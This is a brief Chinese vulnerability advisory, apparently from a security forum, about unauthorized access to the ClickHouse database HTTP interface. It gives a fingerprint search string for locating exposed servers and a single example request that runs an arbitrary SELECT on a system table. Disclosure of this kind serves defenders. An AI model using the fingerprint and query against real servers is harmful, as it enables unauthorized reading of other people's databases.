ClickHouse API 数据库接口未授权访问漏洞

# ClickHouse API 数据库接口未授权访问漏洞 ## 漏洞描述 ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据 ## 漏洞影响 ClickHous...

ClickHouse API 数据库接口未授权访问漏洞

漏洞描述

ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据

漏洞影响

ClickHouse

网络测绘

"ClickHouse" && body="ok"

漏洞复现

登录页面

img

执行SQL语句

img

/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical

img

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计